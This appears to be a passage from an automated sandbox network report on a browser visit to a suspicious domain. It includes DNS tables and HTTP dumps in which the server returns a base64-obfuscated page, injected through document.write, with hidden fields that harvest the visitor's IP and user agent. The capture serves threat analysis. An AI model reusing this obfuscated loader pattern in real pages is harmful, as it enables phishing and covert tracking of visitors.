                          May 22, 2024 17:58:02.257792950 CEST44349818188.114.96.3192.168.2.4
                          May 22, 2024 17:58:02.258565903 CEST49818443192.168.2.4188.114.96.3
                          May 22, 2024 17:58:02.258734941 CEST44349818188.114.96.3192.168.2.4
                          May 22, 2024 17:58:02.259541035 CEST49818443192.168.2.4188.114.96.3
                          May 22, 2024 17:58:02.302498102 CEST44349818188.114.96.3192.168.2.4
                          May 22, 2024 17:58:03.429681063 CEST44349818188.114.96.3192.168.2.4
                          May 22, 2024 17:58:03.429965973 CEST44349818188.114.96.3192.168.2.4
                          May 22, 2024 17:58:03.429991007 CEST49818443192.168.2.4188.114.96.3
                          May 22, 2024 17:58:03.430015087 CEST44349818188.114.96.3192.168.2.4
                          May 22, 2024 17:58:03.430084944 CEST49818443192.168.2.4188.114.96.3
                          May 22, 2024 17:58:03.430084944 CEST49818443192.168.2.4188.114.96.3
                          TimestampSource PortDest PortSource IPDest IP
                          May 22, 2024 17:56:43.411660910 CEST53561861.1.1.1192.168.2.4
                          May 22, 2024 17:56:43.418667078 CEST53525181.1.1.1192.168.2.4
                          May 22, 2024 17:56:44.654356003 CEST53650501.1.1.1192.168.2.4
                          May 22, 2024 17:56:45.282516003 CEST5082853192.168.2.41.1.1.1
                          May 22, 2024 17:56:45.282814980 CEST5064653192.168.2.41.1.1.1
                          May 22, 2024 17:56:45.297631979 CEST53508281.1.1.1192.168.2.4
                          May 22, 2024 17:56:45.313066006 CEST53506461.1.1.1192.168.2.4
                          May 22, 2024 17:56:47.581990004 CEST6042453192.168.2.41.1.1.1
                          May 22, 2024 17:56:47.582128048 CEST4938153192.168.2.41.1.1.1
                          May 22, 2024 17:56:47.589951992 CEST53604241.1.1.1192.168.2.4
                          May 22, 2024 17:56:47.591933966 CEST6127753192.168.2.41.1.1.1
                          May 22, 2024 17:56:47.592298985 CEST5059253192.168.2.41.1.1.1
                          May 22, 2024 17:56:47.592674017 CEST5114253192.168.2.41.1.1.1
                          May 22, 2024 17:56:47.594465017 CEST6362853192.168.2.41.1.1.1
                          May 22, 2024 17:56:47.597054958 CEST53493811.1.1.1192.168.2.4
                          May 22, 2024 17:56:47.604016066 CEST53612771.1.1.1192.168.2.4
                          May 22, 2024 17:56:47.608808994 CEST53511421.1.1.1192.168.2.4
                          May 22, 2024 17:56:47.608840942 CEST53505921.1.1.1192.168.2.4
                          May 22, 2024 17:56:47.608870029 CEST53636281.1.1.1192.168.2.4
                          May 22, 2024 17:56:49.359811068 CEST5529253192.168.2.41.1.1.1
                          May 22, 2024 17:56:49.360445976 CEST5799553192.168.2.41.1.1.1
                          May 22, 2024 17:56:49.768825054 CEST53579951.1.1.1192.168.2.4
                          May 22, 2024 17:56:49.768860102 CEST53552921.1.1.1192.168.2.4
                          May 22, 2024 17:56:51.583726883 CEST5039053192.168.2.41.1.1.1
                          May 22, 2024 17:56:51.583966970 CEST5800253192.168.2.41.1.1.1
                          May 22, 2024 17:56:51.623949051 CEST53503901.1.1.1192.168.2.4
                          May 22, 2024 17:56:51.623969078 CEST53580021.1.1.1192.168.2.4
                          May 22, 2024 17:56:54.260874033 CEST5328053192.168.2.41.1.1.1
                          May 22, 2024 17:56:54.261035919 CEST6157853192.168.2.41.1.1.1
                          May 22, 2024 17:56:54.288579941 CEST53532801.1.1.1192.168.2.4
                          May 22, 2024 17:56:54.305430889 CEST53615781.1.1.1192.168.2.4
                          May 22, 2024 17:57:01.802242041 CEST53590471.1.1.1192.168.2.4
                          May 22, 2024 17:57:07.948215008 CEST138138192.168.2.4192.168.2.255
                          May 22, 2024 17:57:15.737874985 CEST6009653192.168.2.41.1.1.1
                          May 22, 2024 17:57:15.738495111 CEST6014453192.168.2.41.1.1.1
                          May 22, 2024 17:57:15.760346889 CEST53600961.1.1.1192.168.2.4
                          May 22, 2024 17:57:15.760363102 CEST53601441.1.1.1192.168.2.4
                          May 22, 2024 17:57:20.588880062 CEST53535311.1.1.1192.168.2.4
                          May 22, 2024 17:57:20.625947952 CEST5589553192.168.2.41.1.1.1
                          May 22, 2024 17:57:20.625947952 CEST5570853192.168.2.41.1.1.1
                          May 22, 2024 17:57:20.667555094 CEST6032953192.168.2.41.1.1.1
                          May 22, 2024 17:57:20.667820930 CEST5420853192.168.2.41.1.1.1
                          May 22, 2024 17:57:20.684823036 CEST53603291.1.1.1192.168.2.4
                          May 22, 2024 17:57:20.684835911 CEST53557081.1.1.1192.168.2.4
                          May 22, 2024 17:57:20.684847116 CEST53542081.1.1.1192.168.2.4
                          May 22, 2024 17:57:20.689667940 CEST53558951.1.1.1192.168.2.4
                          May 22, 2024 17:57:22.764889002 CEST53563061.1.1.1192.168.2.4
                          May 22, 2024 17:57:26.272460938 CEST53526411.1.1.1192.168.2.4
                          May 22, 2024 17:57:43.187299967 CEST53563841.1.1.1192.168.2.4
                          May 22, 2024 17:57:43.197082996 CEST53576321.1.1.1192.168.2.4
                          May 22, 2024 17:57:54.263720036 CEST6296653192.168.2.41.1.1.1
                          May 22, 2024 17:57:54.264247894 CEST4920753192.168.2.41.1.1.1
                          May 22, 2024 17:57:54.347381115 CEST53492071.1.1.1192.168.2.4
                          May 22, 2024 17:57:54.347393990 CEST53629661.1.1.1192.168.2.4
                          TimestampSource IPDest IPChecksumCodeType
                          May 22, 2024 17:56:45.313143015 CEST192.168.2.41.1.1.1c237(Port unreachable)Destination Unreachable
                          May 22, 2024 17:56:54.305495024 CEST192.168.2.41.1.1.1c21d(Port unreachable)Destination Unreachable
                          May 22, 2024 17:57:26.272711039 CEST192.168.2.41.1.1.1c22e(Port unreachable)Destination Unreachable
                          May 22, 2024 17:57:43.187375069 CEST192.168.2.41.1.1.1c224(Port unreachable)Destination Unreachable
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          May 22, 2024 17:56:45.282516003 CEST192.168.2.41.1.1.10x399eStandard query (0)oknya83345.eleteriod.comA (IP address)IN (0x0001)false
                          May 22, 2024 17:56:45.282814980 CEST192.168.2.41.1.1.10xfe0Standard query (0)oknya83345.eleteriod.com65IN (0x0001)false
                          May 22, 2024 17:56:47.581990004 CEST192.168.2.41.1.1.10xf5c9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                          May 22, 2024 17:56:47.582128048 CEST192.168.2.41.1.1.10xeaf3Standard query (0)www.google.com65IN (0x0001)false
                          May 22, 2024 17:56:47.591933966 CEST192.168.2.41.1.1.10x84a2Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                          May 22, 2024 17:56:47.592298985 CEST192.168.2.41.1.1.10xa739Standard query (0)code.jquery.com65IN (0x0001)false
                          May 22, 2024 17:56:47.592674017 CEST192.168.2.41.1.1.10x5c6fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                          May 22, 2024 17:56:47.594465017 CEST192.168.2.41.1.1.10x9e01Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                          May 22, 2024 17:56:49.359811068 CEST192.168.2.41.1.1.10xb6e0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                          May 22, 2024 17:56:49.360445976 CEST192.168.2.41.1.1.10x3481Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                          May 22, 2024 17:56:51.583726883 CEST192.168.2.41.1.1.10xe204Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                          May 22, 2024 17:56:51.583966970 CEST192.168.2.41.1.1.10xb99bStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                          May 22, 2024 17:56:54.260874033 CEST192.168.2.41.1.1.10xd397Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                          May 22, 2024 17:56:54.261035919 CEST192.168.2.41.1.1.10xb872Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                          May 22, 2024 17:57:15.737874985 CEST192.168.2.41.1.1.10x3f28Standard query (0)oknya83345.eleteriod.comA (IP address)IN (0x0001)false
                          May 22, 2024 17:57:15.738495111 CEST192.168.2.41.1.1.10x1ff2Standard query (0)oknya83345.eleteriod.com65IN (0x0001)false
                          May 22, 2024 17:57:20.625947952 CEST192.168.2.41.1.1.10x3a98Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                          May 22, 2024 17:57:20.625947952 CEST192.168.2.41.1.1.10xa1aStandard query (0)cdn.socket.io65IN (0x0001)false
                          May 22, 2024 17:57:20.667555094 CEST192.168.2.41.1.1.10x8a28Standard query (0)www.google.comA (IP address)IN (0x0001)false
                          May 22, 2024 17:57:20.667820930 CEST192.168.2.41.1.1.10xc94aStandard query (0)www.google.com65IN (0x0001)false
                          May 22, 2024 17:57:54.263720036 CEST192.168.2.41.1.1.10x69daStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                          May 22, 2024 17:57:54.264247894 CEST192.168.2.41.1.1.10x1b99Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          May 22, 2024 17:56:45.297631979 CEST1.1.1.1192.168.2.40x399eNo error (0)oknya83345.eleteriod.com188.114.96.3A (IP address)IN (0x0001)false
                          May 22, 2024 17:56:45.297631979 CEST1.1.1.1192.168.2.40x399eNo error (0)oknya83345.eleteriod.com188.114.97.3A (IP address)IN (0x0001)false
                          May 22, 2024 17:56:45.313066006 CEST1.1.1.1192.168.2.40xfe0No error (0)oknya83345.eleteriod.com65IN (0x0001)false
                          May 22, 2024 17:56:47.589951992 CEST1.1.1.1192.168.2.40xf5c9No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                          May 22, 2024 17:56:47.597054958 CEST1.1.1.1192.168.2.40xeaf3No error (0)www.google.com65IN (0x0001)false
                          May 22, 2024 17:56:47.604016066 CEST1.1.1.1192.168.2.40x84a2No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                          May 22, 2024 17:56:47.604016066 CEST1.1.1.1192.168.2.40x84a2No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                          May 22, 2024 17:56:47.604016066 CEST1.1.1.1192.168.2.40x84a2No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                          May 22, 2024 17:56:47.604016066 CEST1.1.1.1192.168.2.40x84a2No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                          May 22, 2024 17:56:47.608808994 CEST1.1.1.1192.168.2.40x5c6fNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                          May 22, 2024 17:56:47.608808994 CEST1.1.1.1192.168.2.40x5c6fNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                          May 22, 2024 17:56:47.608870029 CEST1.1.1.1192.168.2.40x9e01No error (0)challenges.cloudflare.com65IN (0x0001)false
                          May 22, 2024 17:56:49.768825054 CEST1.1.1.1192.168.2.40x3481No error (0)challenges.cloudflare.com65IN (0x0001)false
                          May 22, 2024 17:56:49.768860102 CEST1.1.1.1192.168.2.40xb6e0No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                          May 22, 2024 17:56:49.768860102 CEST1.1.1.1192.168.2.40xb6e0No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                          May 22, 2024 17:56:51.623949051 CEST1.1.1.1192.168.2.40xe204No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                          May 22, 2024 17:56:51.623949051 CEST1.1.1.1192.168.2.40xe204No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                          May 22, 2024 17:56:51.623969078 CEST1.1.1.1192.168.2.40xb99bNo error (0)challenges.cloudflare.com65IN (0x0001)false
                          May 22, 2024 17:56:54.288579941 CEST1.1.1.1192.168.2.40xd397No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                          May 22, 2024 17:57:15.760346889 CEST1.1.1.1192.168.2.40x3f28No error (0)oknya83345.eleteriod.com188.114.97.3A (IP address)IN (0x0001)false
                          May 22, 2024 17:57:15.760346889 CEST1.1.1.1192.168.2.40x3f28No error (0)oknya83345.eleteriod.com188.114.96.3A (IP address)IN (0x0001)false
                          May 22, 2024 17:57:15.760363102 CEST1.1.1.1192.168.2.40x1ff2No error (0)oknya83345.eleteriod.com65IN (0x0001)false
                          May 22, 2024 17:57:20.684823036 CEST1.1.1.1192.168.2.40x8a28No error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                          May 22, 2024 17:57:20.684835911 CEST1.1.1.1192.168.2.40xa1aNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                          May 22, 2024 17:57:20.684847116 CEST1.1.1.1192.168.2.40xc94aNo error (0)www.google.com65IN (0x0001)false
                          May 22, 2024 17:57:20.689667940 CEST1.1.1.1192.168.2.40x3a98No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                          May 22, 2024 17:57:20.689667940 CEST1.1.1.1192.168.2.40x3a98No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                          May 22, 2024 17:57:20.689667940 CEST1.1.1.1192.168.2.40x3a98No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                          May 22, 2024 17:57:20.689667940 CEST1.1.1.1192.168.2.40x3a98No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                          May 22, 2024 17:57:20.689667940 CEST1.1.1.1192.168.2.40x3a98No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                          May 22, 2024 17:57:54.347393990 CEST1.1.1.1192.168.2.40x69daNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                          • oknya83345.eleteriod.com
                          • https:
                            • code.jquery.com
                            • challenges.cloudflare.com
                            • www.google.com
                            • cdn.socket.io
                          • fs.microsoft.com
                          • a.nel.cloudflare.com
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449737188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:45 UTC678OUTGET /infd201971/ HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-User: ?1
                          Sec-Fetch-Dest: document
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:56:47 UTC1003INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:56:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Cache-Control: no-cache, private
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T84dDhHR1c6A67cdfeSOnSyIYFPz1hexa%2F%2BtgHSlFZRFxoPi7OYydi8TsmGpxu6iHE4vzeRZGmmeXMb9JZ8b84T2715iaSSOiG4l28jjmlZmPeZqax1q0Qc5ktiEyw%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Set-Cookie: XSRF-TOKEN=eyJpdiI6Ilk0L1dSZVJ5TGJsOVRGTHNiWUxvS2c9PSIsInZhbHVlIjoiRjhRQU1qKzVESlpKZzVxQ3JmdmpPLy9SZGhBWHZwTGNLQ3FxeHI0QVZSOWNkOWEzVHZvZytuQ2tNT0FUUEdxemtETUx2T2hkR2V6YXpMMTRDN2UvTnJELzlubUxFY2RGdGRYYTN5WmJOWDh4UnE3RHpqOGo5N2JTekF0RmpqMjUiLCJtYWMiOiIwNWNlNTQ3ZGY2OWVlZGVmY2JmMThjNzEwMGZmODkxNWViZjFmODExODIyZjMyY2M0ZGJjMDEyYTQ1ZDI5ODI1IiwidGFnIjoiIn0%3D; expires=Wed, 22-May-2024 17:56:47 GMT; Max-Age=7200; path=/; secure; samesite=none
                          2024-05-22 15:56:47 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 35 33 56 54 55 34 54 7a 6c 70 63 7a 42 34 5a 55 74 4f 63 47 63 7a 5a 47 4e 33 4b 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 30 64 68 51 57 35 57 63 45 74 4e 64 32 51 31 62 6c 64 45 63 57 52 52 54 33 5a 61 63 6c 6c 34 52 55 39 75 57 46 70 58 57 56 70 34 52 31 52 55 51 6b 56 51 63 54 5a 57 57 45 68 4e 51 32 5a 7a 54 55 39 74 54 58 68 4d 4d 33 6c 33 62 79 39 46 59 55 4a 77 53 47 68 6c 63 30 78 6d 54 57 35 43 57 54 42 52 4d 57 70 4e 54 6d 73 34 4e 56 6c 72 59 57 49 76 4d 33 52 55 54 6d 63 72 57 57 31 77 64 31 49 79 4d 58 5a 46 64 6c 70 4d 63 31 6c 72 4f 54 42 71 62 6a 4a 48 56 43 39 32 53 31 70 6d 4d 7a 64 70 54 57 52 59 64 45 51
                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ik53VTU4TzlpczB4ZUtOcGczZGN3K2c9PSIsInZhbHVlIjoiV0dhQW5WcEtNd2Q1bldEcWRRT3Zacll4RU9uWFpXWVp4R1RUQkVQcTZWWEhNQ2ZzTU9tTXhMM3l3by9FYUJwSGhlc0xmTW5CWTBRMWpNTms4NVlrYWIvM3RUTmcrWW1wd1IyMXZFdlpMc1lrOTBqbjJHVC92S1pmMzdpTWRYdEQ
                          2024-05-22 15:56:47 UTC1369INData Raw: 31 34 31 36 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4e 69 34 77 4c 6d 31 70 62 69 35 71 63 79 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 32 68 68 62 47
                          Data Ascii: 1416<script>document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbG
                          2024-05-22 15:56:47 UTC1369INData Raw: 64 47 38 37 64 32 6c 6b 64 47 67 36 4d 7a 4d 75 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 6c 4f 33 30 4e 43 6e 30 4e 43 69 4e 45 65 45 4e 77 59 6e 52 31 63 6e 5a 6a 49 43 35 6b 61 58 4e 77 62 47 46 35 4c 54 51 67 65 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 53 34 79 4e 58 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 30 52 34 51 33 42 69 64 48 56 79 64 6d 4d 67 4c 6d 31 30 4c 54 49 67 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 41 75 4e 58 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 30 52 34 51 33 42 69 64 48 56 79 64 6d 4d 67 4c 6d 67 30 49 48 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 47 4e 68 62 47 4d 6f 4c 6a 6b 77 4d 48 4a 6c 62 53 41 72 49 43 34 7a 64 6e 63 70 4f 33 30 4e 43 69 4e 45 65 45 4e
                          Data Ascii: dG87d2lkdGg6MzMuMzMzMzMzMzMlO30NCn0NCiNEeENwYnR1cnZjIC5kaXNwbGF5LTQge2ZvbnQtc2l6ZTogMS4yNXJlbSFpbXBvcnRhbnQ7fQ0KI0R4Q3BidHVydmMgLm10LTIge21hcmdpbi10b3A6IDAuNXJlbSFpbXBvcnRhbnQ7fQ0KI0R4Q3BidHVydmMgLmg0IHtmb250LXNpemU6IGNhbGMoLjkwMHJlbSArIC4zdncpO30NCiNEeEN
                          2024-05-22 15:56:47 UTC1369INData Raw: 69 42 32 59 57 78 31 5a 54 30 69 4f 43 34 30 4e 69 34 78 4d 6a 4d 75 4d 54 63 31 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 64 57 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 31 59 53 49 67 64 6d 46 73 64 57 55 39 49 6b 31 76 65 6d 6c 73 62 47 45 76 4e 53 34 77 49 43 68 58 61 57 35 6b 62 33 64 7a 49 45 35 55 49 44 45 77 4c 6a 41 37 49 46 64 70 62 6a 59 30 4f 79 42 34 4e 6a 51 70 49 45 46 77 63 47 78 6c 56 32 56 69 53 32 6c 30
                          Data Ascii: iB2YWx1ZT0iOC40Ni4xMjMuMTc1Ij4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkcmVmIiBuYW1lPSJibHRkcmVmIiB2YWx1ZT0iIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkdWEiIG5hbWU9ImJsdGR1YSIgdmFsdWU9Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0
                          2024-05-22 15:56:47 UTC1043INData Raw: 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6b 62 32 4e 31 62 57 56 75 64 43 35 6e 5a 58 52 46 62 47 56 74 5a 57 35 30 51 6e 6c 4a 5a 43 67 69 63 47 46 6e 5a 57 78 70 62 6d 73 69 4b 53 35 32 59 57 78 31 5a 53 41 39 49 43 64 30 5a 48 67 79 63 69 63 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 5a 68 63 69 42 75 61 47 5a 68 51 31 4e 75 62 55 46 4d 49 44 30 67 49 69 34 75 4c 32 31 34 51 30 46 4c 55 30 5a 4d 57 6b 68 61 5a 31 4e 69 61 55 34 32 64 57 68 36 55 44 52 34 59 6c 70 71 5a 69 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 5a 6c 64 47 4e 6f 4b
                          Data Ascii: 50KSB7DQogICAgICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICB9Ow0KICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgicGFnZWxpbmsiKS52YWx1ZSA9ICd0ZHgycic7DQogICAgICAgIHZhciBuaGZhQ1NubUFMID0gIi4uL214Q0FLU0ZMWkhaZ1NiaU42dWh6UDR4YlpqZiI7DQogICAgICAgIGZldGNoK
                          2024-05-22 15:56:47 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.449742151.101.66.1374435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:48 UTC630OUTGET /jquery-3.6.0.min.js HTTP/1.1
                          Host: code.jquery.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://oknya83345.eleteriod.com/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:56:48 UTC562INHTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 89501
                          Server: nginx
                          Content-Type: application/javascript; charset=utf-8
                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                          ETag: "28feccc0-15d9d"
                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                          Access-Control-Allow-Origin: *
                          Via: 1.1 varnish, 1.1 varnish
                          Accept-Ranges: bytes
                          Age: 2249589
                          Date: Wed, 22 May 2024 15:56:48 GMT
                          X-Served-By: cache-lga21931-LGA, cache-ewr18127-EWR
                          X-Cache: HIT, HIT
                          X-Cache-Hits: 5746, 0
                          X-Timer: S1716393408.152921,VS0,VE1
                          Vary: Accept-Encoding
                          2024-05-22 15:56:48 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                          2024-05-22 15:56:48 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
